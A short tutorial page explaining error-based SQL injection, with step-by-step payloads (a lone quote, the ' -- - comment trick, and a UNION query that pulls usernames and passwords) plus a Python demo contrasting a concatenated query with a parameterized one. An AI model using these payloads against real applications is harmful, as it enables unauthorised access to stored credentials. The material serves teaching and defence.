Error-based SQLi


Error-based SQLi is the simplest form of SQL injection: the application displays the DBMS error messages to the user.

An attacker can use that output to tweak the payload until the query does what they want.


Error-based SQLi Explained

  1. We usually start by injecting a quote ':
Select name,desc from product where name LIKE '%'%'

☠️ The query fails because its syntax is invalid (the trailing %' is left dangling), but we now know that an injection is possible.

  2. We then comment out the rest of the query using ' --.
Select name,desc from product where name LIKE '%' --%'

☠️ This may not work on every DBMS, because some require whitespace after the -- that starts a comment.

  3. We add a space, giving us the payload ' -- - (the trailing - only keeps the space from being trimmed away).
Select name,desc from product where name LIKE '%' -- -%'

✅ Between ' and -- -, we can write any SQL code, though the syntax of the final query must be valid ✌️.

For instance, we could use xxx' UNION Select username,password FROM users -- - to get the list of usernames/passwords.

Select name,desc from product where name LIKE '%' UNION Select username,password FROM users -- -%'

See the notes on union-based payloads.
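To see the three steps above from the defending side, here is an added example (not part of the original notes) that builds the same product search twice in SQLite: once by string concatenation, as in the queries shown, and once with a bound parameter. The product table, its rows and the column name description (used instead of desc, which is a reserved word) are assumptions made for this demonstration.

```python
import sqlite3

# Constructed sample catalogue, used only for this demonstration.
SAMPLE_PRODUCTS = [("laptop", "13-inch"), ("phone", "5G"), ("lamp", "desk lamp")]


def make_db():
    """In-memory database with the assumed product table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product (name TEXT, description TEXT)")
    con.executemany("INSERT INTO product VALUES (?, ?)", SAMPLE_PRODUCTS)
    return con


def search_vulnerable(con, term):
    """String-concatenated query, shaped like the page's examples.
    Returns ('rows', [...]) or ('error', message): the message is the
    DBMS error that an error-based SQLi relies on seeing."""
    sql = "SELECT name, description FROM product WHERE name LIKE '%" + term + "%'"
    try:
        return ("rows", con.execute(sql).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def search_parameterized(con, term):
    """Bound parameter: the term is data and is never parsed as SQL."""
    sql = "SELECT name, description FROM product WHERE name LIKE ?"
    return ("rows", con.execute(sql, ("%" + term + "%",)).fetchall())


def compare(term):
    """Run both variants on a fresh database for the same search term."""
    con = make_db()
    return {
        "vulnerable": search_vulnerable(con, term),
        "parameterized": search_parameterized(con, term),
    }


if __name__ == "__main__":
    # "lap" is a normal search; "'" is step 1; "' -- -" is step 3.
    for term in ["lap", "'", "' -- -"]:
        print(repr(term), compare(term))
```

With the concatenated query, the lone quote produces a syntax error (the signal step 1 looks for) and the comment payload returns the whole table; the parameterized query simply searches for those characters and returns nothing.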